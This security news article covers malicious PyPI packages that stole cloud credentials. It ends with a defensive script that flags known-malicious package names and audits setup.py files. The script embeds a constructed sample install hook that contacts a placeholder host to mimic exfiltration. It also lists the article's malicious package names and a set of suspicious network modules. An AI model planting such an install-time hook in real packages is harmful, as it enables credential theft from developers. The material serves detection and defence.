Malicious PyPI packages have been discovered stealing cloud tokens, compromising thousands of users. Researchers found 20 harmful packages disguised as useful tools, tricking developers into installing them. These packages, downloaded over 14,100 times, targeted cloud service credentials from major platforms.
A recent report identified two clusters of malicious PyPI packages. The first set included tools that uploaded stolen data to an attacker’s server. The second group imitated cloud client SDKs for services like Alibaba Cloud, AWS, and Tencent Cloud. Attackers also used “time”-themed packages to disguise their intentions. Fortunately, these harmful packages have been removed.
Further investigation revealed that three of these packages (acloud-client, enumer-iam, and tcloud-python-test) were dependencies of a popular GitHub project, accesskey_tools. This project had 42 forks and 519 stars, increasing the reach of these malicious packages. One of these dependencies, tcloud-python-test, had been available since November 8, 2023, accumulating 793 downloads.
Researchers also discovered that similar threats exist beyond PyPI. Thousands of suspicious packages in PyPI and npm contain hidden install scripts, allowing attackers to deploy malware or establish remote access. Some of these scripts use URLs linked to data exfiltration, additional malware downloads, or communication with command-and-control (C2) servers. These threats highlight the importance of securing open-source repositories.
How to Prevent
To protect against such attacks, developers must carefully inspect dependencies before installation. Verifying package sources, checking for unusual commit histories, and scanning for suspicious URLs can help prevent compromise. Organizations should also implement strict security policies, including dependency scanning tools and access controls, to reduce the risk of credential theft.
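As an added illustration of the checks recommended above (not code from the report), the following script flags requirements that match the package names the report lists and audits a setup.py for install-time hooks, network imports and embedded URLs, the kind of hidden install script described earlier. The sample setup.py is constructed for the demonstration; the hostname in it is a placeholder.

```python
"""Audit a Python dependency set for the red flags described in the report:
known-malicious names and setup.py install-time hooks that reach the network."""
import ast
import re

# Names taken from the report above; extend from your own intel feed.
KNOWN_MALICIOUS = {"acloud-client", "enumer-iam", "tcloud-python-test"}
URL_RE = re.compile(r"https?://[^\s'\"]+")
SUSPICIOUS_MODULES = {"urllib", "requests", "socket", "http", "subprocess"}
INSTALL_BASES = {"install", "develop", "egg_info", "build_py"}

def normalize(name):
    # PEP 503 normalisation so "Tcloud_Python_Test" matches "tcloud-python-test"
    return re.sub(r"[-_.]+", "-", name).lower()

def flag_requirements(requirements_text):
    """Return requirement names that match the known-malicious list."""
    hits = []
    for line in requirements_text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        name = re.split(r"[<>=!~;\[ ]", line, 1)[0]  # strip version/extras
        if normalize(name) in KNOWN_MALICIOUS:
            hits.append(name)
    return hits

def audit_setup_py(source):
    """Look for setuptools command overrides, network imports and URLs."""
    tree = ast.parse(source)
    findings = {"install_hooks": [], "network_imports": [], "urls": []}
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            # A class deriving from install/develop runs code at `pip install` time
            bases = {b.id if isinstance(b, ast.Name) else getattr(b, "attr", "")
                     for b in node.bases}
            if bases & INSTALL_BASES:
                findings["install_hooks"].append(node.name)
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            names = ([a.name for a in node.names] if isinstance(node, ast.Import)
                     else [node.module or ""])
            findings["network_imports"] += [n for n in names
                                            if n.split(".")[0] in SUSPICIOUS_MODULES]
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            findings["urls"].extend(URL_RE.findall(node.value))   # string literals only
    return findings

# Constructed sample mimicking a credential-exfiltrating install hook (placeholder host).
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request
class PostInstall(install):
    def run(self):
        install.run(self)
        urllib.request.urlopen("http://example.invalid/collect")
setup(name="tcloud-python-test", version="0.1", cmdclass={"install": PostInstall})
'''
```

Run `audit_setup_py` against the sdist's setup.py before installing, and treat any non-empty `install_hooks` combined with network imports or URLs as grounds for manual review.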
Sleep well, we got you covered.